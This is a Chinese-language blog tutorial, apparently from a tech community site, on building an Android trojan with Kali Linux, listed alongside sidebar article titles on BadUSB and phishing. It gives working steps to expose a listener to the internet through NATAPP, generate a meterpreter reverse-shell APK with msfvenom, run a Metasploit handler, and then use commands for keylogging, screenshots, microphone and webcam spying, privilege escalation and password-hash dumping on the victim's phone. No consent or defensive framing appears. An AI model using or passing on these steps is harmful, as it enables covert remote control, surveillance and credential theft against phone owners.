首页
学习
活动
专区
圈层
工具
发布
37 篇文章
1
7块钱的BadUSB,怎么玩
2
插一个U盘黑一台电脑-Badusb最详细制作教程
3
十块钱RMB | 用Digispark制作一个简单的Badusb
5
打造属于自己的渗透神器 第二篇
6
社工模拟——利用BadUSB穿透3层内网
7
穿透内网防线,USB自动渗透手法总结
8
【内网渗透】神器Mimikatz的入门简单实践
9
实战渗透 | 情侣空间钓鱼邀请,撸它
10
渗透实战之QQ空间钓鱼网站
11
【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]
12
QQFishing QQ钓鱼站点搭建
13
看我如何定位骗子,找出幕后诈骗的黑手(上)
14
我用Python渗透了一个钓鱼网站的所有信息
15
简单的制作一个钓鱼网页游戏_简单网页制作代码
16
攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
17
CobaltStrike专题 | CobaltStrike实现批量发送钓鱼邮件
18
关于钓鱼网站的原理以及防范方法
19
社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性
20
关于ReelPhish神器的使用
21
七、Selenium与phantomJS----------动态页面模拟点击、网站模拟登录 每天一个小实例1(动态页面模拟点击,并爬取你想搜索的职位信息) 每天一个小实例2(模拟网站登录)我用的是
22
社会工程学 | cobalstrike批量发送钓鱼邮件方法
23
我用Python采集了所有微信好友的头像,发现了一个秘密
24
插入U盘自动攻击:BadUSB原理与实现(含视频)
25
珍惜数据,远离钓鱼
26
钓鱼网站相关数据
27
记一次识别钓鱼网站,所有的盗号都是不经意间
28
如何利用手机木马远程控制
29
如何使用Kali生成木马入侵安卓手机
30
黑客入侵你手机的方法不止两种哦
31
一个黑客的自白书
33
Kali之安卓木马
34
Kali利用Android木马渗透手机(高级篇)
35
记一次无线渗透
36
记一次渗透测试实战
37
你安全吗?丨点击“不明链接”后果是什么你知道吗?
清单首页技术文章详情

Kali之安卓木马

Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:

实现内网穿透

Metasploit木马操作

一、实现内网穿透

1.进入https://natapp.cn/,根据提示注册并创建免费隧道

2 进入https://natapp.cn/#download下载linux的客户端

3 命令行内启动natapp。语句: ./natapp -authtoken=************ 后面的星号换成自己的authtoken口令(如果提示权限不够 chmod a+x natapp )

4 得到服务器地址。ping 一下第一个圈内的服务器。得到ip地址是xxx.x.xx.x 后面位端口号:34611

二、Metasploit木马操作

5.生成木马APP。然后输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=服务器的ip(上面ping服务器得到的ip) LPORT=34611(上面服务器的端口号) R > /root/apk.apk

34611是设置的端口,显示这个说明已经生成木马成功了,如图:

6.启动msf。msfconsole 然后输入命令:

代码语言:javascript
代码运行次数:0
复制
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload

修改ip与端口

代码语言:javascript
代码运行次数:0
复制
set LHOST 127.0.0.1 //这里的地址设置成NATAPP中配置的本地ip
set LPORT 2018 //这里的地址设置成NATAPP中配置的本地端口
exploit //开始监听等待木马响应

下面是一些木马的常用命令:

enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)

getdesktop -->得到当前的Meterpreter桌面

idletime -->返回秒远程用户已经闲置数量

keyscan_dump -->转储按键缓冲(下载键盘记录)

keyscan_start -->开始捕获击键(开始键盘记录)

keyscan_stop -->停止捕获击键(停止键盘记录)

screenshot -->抓取交互式桌面截图(当前操作界面截图一张)

setdesktop -->改变meterpreters当前桌面

uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)

使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat -->开始视频聊天(视频,对方会有弹窗)

webcam_list -->单摄像头(查看摄像头列表)

webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)

其他命令操作

getsystem -->获取高权限

hashdump -->获取当前用户hash

THE END

下一篇
举报
领券